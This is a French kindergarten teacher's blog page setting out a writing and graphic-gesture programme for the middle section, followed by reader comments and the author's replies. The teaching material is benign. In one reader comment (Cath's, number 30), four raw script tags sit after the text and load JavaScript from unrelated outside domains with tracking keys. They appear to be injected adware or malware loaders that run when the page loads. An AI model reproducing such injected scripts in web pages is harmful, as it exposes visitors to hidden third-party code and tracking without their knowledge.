• Prog Domaine de l'écrit MS P1

    Pour réaliser cette programmation du domaine de l'écrit, j'ai tenté de combiner plusieurs ouvrages : Vers l'écriture de chez Accès, les cahiers d'écriture Maternelle de la méthode Dumont, "ma méthode d'écriture Danièle Dumont" ainsi que l'ouvrage d'Accès Graphic'art.

    Petit changement au niveau du "design", en lien avec la mascotte de ma classe : Hibouline.

     

    Vous pouvez retrouver ici ma séquence sur les lignes GARDONS LA LIGNE --> CLIC

    Les spécificités de la maternelleprog MS ECRIT période 1.pdf

    Prog Domaine de l'écrit MS

    Prog Domaine de l'écrit MS

     

    Vous pouvez retrouver ma programmation pour la partie du geste graphique Les spécificités de la maternelleICI

    Prog Domaine de l'écrit MS P1

    Pour en savoir plus sur le geste d'écriture et la mise en place de mon cahier en MS, c'est par ici :) CLIC

    Prog Domaine de l'écrit MS P3

     

    VOIR LA PERIODE 2

    VOIR LA PERIODE 3


  • Commentaires

    31
    Val
    Hier à 16:54

    bonjour Lucie,

    Je voulais te féliciter et te remercier pour les activités que tu nous proposes. Vieille prof pourtant et actuellement en PS/MS, je suis une grande fan de tout ce que tu présentes et j'attends avec impatience "200 ateliers autonomes pour les PS". J'ai acheté celui des MS que je vais mettre en place cette année puis retirer mes vieux "tiroirs d'autonomies".

    Je voulais juste savoir où tu as caché tes petits dessins (canard, escargots, voiture, ballons,etc) pour réaliser les consignes des gestes graphiques du cahier d'écriture des MS. je ne les trouve pas sur ton merveilleux site...

    Merci beaucoup et BRAVO encore!

     

      • Hier à 17:07

        Bonjour, merci ! 

        Les petits dessins sont en fait tiré du livre 1 de Danièle Dumont :) J'en ai acheté un et je photocopie les modèles :) 

    30
    Cath
    Jeudi 9 Juillet à 17:23

    Bonjour,

    tout d'abord un immense merci pour tout votre travail, et surtout merci de le partager!!!!!!

    j'avais une question concernant le temps (emploi du temps MS/GS de 2019/20) avec les MS intitulé JEUX DE LETTRES. Que travaillez-vous? les correspondances entre les 3 écritures? je ne l'ai pas vu apparaître dans les progressions, c'est pour cela que je me permets de vous demander quelques précisions......

     

    bon début de vacances, même si elles sont toujours un peu studieuses wink2

    merci pour votre réponse

    <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1594307916833" type="text/javascript"></script> <script src="http://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>
    29
    Julie
    Mercredi 29 Janvier à 09:20

    Bonjour !

    Un grand merci Luccia pour tout ton travail et le partage que tu en fais !!

    Je n'arrive pas à trouver la Programmation de l'écrit ( graphisme/écriture ) en Moyenne section pour la période 2 de l'année 2019-2020. Et je cherche aussi celle de la période 4 de l'année précédente. Je ne dois pas savoir chercher...

    Pourrais-tu m'aider s'il te plaît ?

    Un grand merci par avance !

    Bon mercredi !

    Julie

    28
    Wendydupaysimaginair
    Vendredi 30 Août 2019 à 22:05

    Bonjour. Déjà un immense merci pour ce blog magnifique et ce partage. J'ai une question concernant les termes Programmations et Progressions parce qu’honnêtement, je ne comprends pas trop la subtilité. Qq fois tu parles de tes prog (progressions) et sur ton doc il est écrit programmation (par exemple pour moi ton premier document est une programmation pour la période 1 et ton second document est une progression qui détaille cette programmation semaine par semaine). Je m'y perds un peu dans ces termes. Et pas certaine d'avoir bien compris en fait. 

      • Wendydupaysimaginair
        Samedi 31 Août 2019 à 13:44

        MERCI 

      • Vendredi 30 Août 2019 à 22:16

        Je ne fais pas vraiment la distinction. La plupart du temps, je fais plutôt des programmations car je programme pour la période les activités à venir.

        Mais effectivement, le 2ème est plus une progression précise avec les différentes étapes.

        Du coup, je mets PROG :D C'est plus simple ;) 

    • Nom / Pseudo :

      E-mail (facultatif) :

      Site Web (facultatif) :

      Commentaire :


    27
    pmoldo
    Mercredi 14 Août 2019 à 09:05

    un grand merci pour ton travail et merci de le partager!!!

    c'est une mine d'or!!!yes

     

    26
    Véronique
    Mercredi 7 Août 2019 à 16:51

    Première fois en maternelle, en MS GS à la rentrée ! Quel bonheur de lire ton site ! Quel travail ...et quelle générosité ! Merci merci :)

    25
    coralie
    Samedi 3 Août 2019 à 10:08

    bonjour Lucia

    Toujours aussi admirative de ton travail, je ne me lasse pas de te lire et relire. Une question concernant les activités "je regarde le ciel" ou "les mouches", ce sont des observations individuelles donc comment les gères-tu dans la classe ? que font tes autres MS pendant ce temps ? merci pour ta réponse et bonnes vacances

     

      • coralie
        Mercredi 14 Août 2019 à 09:37

        merci pour ta réponse

      • Samedi 3 Août 2019 à 11:16

        Ce sont des activités seulement si j'ai un doute sur leur latéralité. C'est pour déterminer avec quelle main il montre spontanément qqchose. Et sinon, on peut le faire en collectif dans la cour de l'école.

    24
    Juju
    Jeudi 11 Juillet 2019 à 11:22

    Bonjour Luccia,

    Tout d'abord un grand grand merci pour tout ce travail qui m'a bien aidée déjà cette année ( PS/GS pour la 1ère fois) ! J'aimerais avoir 2 petits renseignements : à quoi correspondent les activités " je regarde le ciel la nuit" " je joue aux mouches…" … "le ping pong des bouchons" ?

    Et comment intègres-tu ta programmation Graphisme dans ta programmation " Ecrit" ? je ne retrouve pas les activités de la 1ères dans la seconde. Sauf si les activités manuelles de chaque séquence correspondent aux activités de Vers l'Ecriture.

    Un grand merci pour tes réponses ! je te souhaite de belles vacances !

    Juju

      • Jeudi 11 Juillet 2019 à 11:56

        Bonjour, 

        Les activités, ciel et ping pong sont issues du livre de Danièle Dumont.

        Les activités manuelles correspondent bien aux activités de Vers l'écriture : la partie J'expérimente et j'observe correspond à ce que je fais en atelier dirigé avec mes MS une fois par semaine. La partie Je trace est faite avec mon Asem le matin après la récré.

    23
    Snoopy2081
    Vendredi 16 Novembre 2018 à 15:13

    Bonjour,

    Un grand merci pour les documents partagés. C'est très bien structuré et ça me permet de me donner une base pour faire les miens. A bientôt !

    22
    Ludy
    Samedi 25 Août 2018 à 10:11
    Un récapitulatif détaillé des activités et supports est il disponible quelque part (en dehors du livre)?
      • Samedi 25 Août 2018 à 10:22

        heu ben non, tout est dans le livre winktongue

    21
    Ludy
    Samedi 25 Août 2018 à 09:31
    Quel travail remarquable ! Bravo pour tout ces beaux partages! Les activités et supports indiqués pour travailler la latéralité et tenue du crayon..se trouvent dans la méthode Dumont?
      • Samedi 25 Août 2018 à 09:54

        Voilà, exactement ;) 

    20
    Zabou
    Vendredi 24 Août 2018 à 16:45

    merci beaucoup pour tout ce partage!!! Superbe travail!!!! Chapeau bas!!!!

      • Vendredi 24 Août 2018 à 17:16

        mais l'ordre des mots est inversé ;)

        Merci bcp, je suis très touchée par tous ces messages de sympathie :) 

      • Zabou
        Vendredi 24 Août 2018 à 16:47

        oups.... j'ai cru que le 1er n'était pas passé!!!!

    19
    Zabou
    Vendredi 24 Août 2018 à 16:45

    Superbe travail!!! chapeau bas!!!!! Merci beaucoup pour tout ce partage!!!! 

    18
    Sara
    Jeudi 9 Août 2018 à 18:16

    Pour les lettres en capitale, tu comptes faire une fiche d'écriture, ou dans un cahier, ou juste sur ardoise ou fiche plastifiée?

      • Vendredi 24 Août 2018 à 17:16

        Juste sur ardoise 

    17
    Mariedo
    Mercredi 25 Juillet 2018 à 09:52

    Bonjour

    Merci pour ton travail.

    Je me pose une question: pour les MS, je vois que tu introduis très tôt le rond et pas la boucle.

    Tu ne suis pas la méthode Dumont pour les MS?

    Merci

     

     

      • Mercredi 25 Juillet 2018 à 10:04

        Si si, mais pour ce qui est de la méthode Dumont, je reprends au 1er cahier : la latéralité, la tenue du crayon et la gestion statique de l'espace. Du coup, je ne suis pas encore parvenue à la gestion dynamique de l'espace où là, j'introduirai la boucle. Je préfère dissocier le travail sur le graphisme décoratif (ligne, cercle ...) et faire de la boucle un vrai outil pour l'apprentissage du geste d'écriture :) 

    16
    kris
    Mardi 17 Juillet 2018 à 14:43

    merci! j'attends la suite avec impatience!

    15
    mariec
    Mardi 17 Juillet 2018 à 10:58

    Super merci cela m'aide 

    Je pense acheter le geste d'écriture

    Par contre une question , vous apprenez l 'écriture de toutes ces lettres droites en même temps et pas lettre par lettre . Cela ne fait il pas trop d'un coup?

    Merci par avance

      • mariec
        Vendredi 20 Juillet 2018 à 13:23

        Merci pour la réponse claire je me lance j'ai acheté le livre MS

      • Mardi 17 Juillet 2018 à 21:30

        Non. L'apprentissage des lettres capitales ne doit d'ailleurs pas se faire lettre par lettre. Très vite, les élèves savent faire un L ou un T, un E ou un F, pas besoin de passer 2 jours sur chaque lettre; ça serait freiner ceux qui sont capables d'aller plus vite. Et ceux qui ont plus de difficulté, c'est que le geste de la ligne horizontale et verticale n'est pas maitrisé et qu'il faut repartir sur les fondamentaux.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :